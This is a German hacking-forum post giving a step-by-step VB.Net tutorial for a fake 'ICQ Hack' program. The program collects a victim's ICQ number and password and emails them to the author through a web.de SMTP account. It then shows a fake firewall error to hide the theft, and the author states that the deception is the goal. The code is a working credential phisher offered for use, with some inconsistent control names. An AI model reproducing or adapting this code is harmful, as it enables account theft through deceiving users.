Ergebnis 1 bis 10 von 14

Baum-Darstellung

  1. #1
    Fortgeschrittener Avatar von Kohlensäure
    Registriert seit
    30.10.2008
    Beiträge
    34

    Standard [VB.Net][Text-Tut]Einfaches Phishing Tool

    Hallo Free-Hack,
    heute möchte ich euch zeigen wie ihr ein einfaches Phishing Tool erstellt.

    Was ihr braucht ?
    -Ein Gehirn
    -Ein Compiler
    -Grundkenntnisse in VB.Net

    So nun fangen wir an.

    Ihr erstellt euch erstmal eine neue Windows Applikation und nennt diese z.B. "ICQ Hack".
    Dann fügt ihr 2 Labels ein und 2 Textboxe, 1 Button. Ihr benennt diese erstmal um in
    :
    -Label1 = ICQ Nummer
    -Label2 = ICQ Passwort
    -Button1 = Verbinden

    Nun stellt ihr diese so in das Formular wie euch es passt Vielleicht fügt ich noch paar nette Bildchen ein damit das Tool "echter" wirkt.

    Nun gehen wir zum Coding Teil !
    Als erstes ändert ihr bei der Textbox die zum Password gehört die Eigenschaften, einfach Textbox markieren und dann "Password Char" suchen und dort "*" einfügen (ohne "). Nun geht ihr auf den Button und geht ins Coding Fenster. Erstmal sollte es so aussehen :
    Code:
    Public Class Form1
    
    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    End Class
    Nun geht ihr zu Public Class Form1 und schreibt dadrüber folgendes herein :
    Code:
    Imports System.Net.Mail
    Imports System.Net
    Und nun zum Button, dort schreibt ihr dies wie folgt
    Code:
    Dim text As String
    text = "ICQ ID: " & TextBox1.Text & "ICQ Password: " & TextBox2.Text
    Nun damit leitet ihr sozu ein das die EMail die Daten bekommt die in die Textbox1 und 2 eingetragen werden, Textbox1 ist die ICQ Nummer, Textbox2 das ICQ Passwort. Nun fügen mir eine kleine Fehler Meldung rein damit die Person denkt das dass Tool KEIN Fake ist.
    Code:
    If TextBox1.Text = "" Then
    MsgBox("Bitte geben sie ihren ICQ Nummer ein.", MsgBoxStyle.Critical)
    End If
    If TextBox2.Text = "" Then
    MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
    End If
    Nun sollte alles bis jetzt so aussehen
    Code:
    Imports System.Net.Mail
    Imports System.Net
    Public Class Form
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            Dim text As String
            text = "ICQ ID: " & TextBoxID.Text & "ICQ Password: " & TextBoxPass.Text
            If TextBox1.Text = "" Then
                MsgBox("Bitte geben sie ihren Flyff ID ein.", MsgBoxStyle.Critical)
            End If
            If TextBox2.Text = "" Then
                MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
            End If
    End Class
    Nun kommt das eigentliche worauf wir hinaus wollen ihr fügt nun folgendes beim Button1 Code hinein:
    Code:
            Dim eMail As New Net.Mail.SmtpClient("smtp.web.de")
            eMail.Credentials = New NetworkCredential("DEINEEMAIL@web.de", "DEINPW")
            eMail.Send("DEINEEMAIL@web.de", "DEINEEMAIL@web.de", "Betreff", text)
            MsgBox("Ihre Firewall blockiert das Programm", MsgBoxStyle.Critical)
    Nun müsst ihr das editieren und eure Email dort einfügen, bei DEINEEMAIL und dein Passwort von dem Email Account, es geht eigentlich nur mit Web.de oder Gmx, falls ihr Gmx wählt solltet ihr noch den SMTP Server ändern. Nun sieht alles so aus !
    Code:
    Imports System.Net.Mail
    Imports System.Net
    Public Class Form
        Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
            Dim text As String
            text = "ICQ ID: " & TextBoxID.Text & "ICQ Password: " & TextBoxPass.Text
            If TextBox1.Text = "" Then
                MsgBox("Bitte geben sie ihren Flyff ID ein.", MsgBoxStyle.Critical)
            End If
            If TextBox2.Text = "" Then
                MsgBox("Bitte geben sie ihr Passwort ein.", MsgBoxStyle.Critical)
            End If
            Dim eMail As New Net.Mail.SmtpClient("smtp.web.de")
            eMail.Credentials = New NetworkCredential("DEINEEMAIL@web.de", "DEINPW")
            eMail.Send("DEINEEMAIL@web.de", "DEINEEMAIL@web.de", "Betreff", text)
            MsgBox("Ihre Firewall blockiert das Programm", MsgBoxStyle.Critical)
    End Sub
    End Class
    Ich hoffe es hat euch ein bisschen geholfen, ich konnte das leider nicht so gut erklären ich hoffe ihr versteht es wenigstens auch so
    Wenn ihr Fehler entdeckt, dann bitte ich euch dies zu Posten, denn aus Fehlern lernt man, und ich bin bereit zu lernen

    :p
    Meine Signatur wurde entfernt

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    BlackCobra (12.03.2010), Bullterrier (12.03.2010)

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •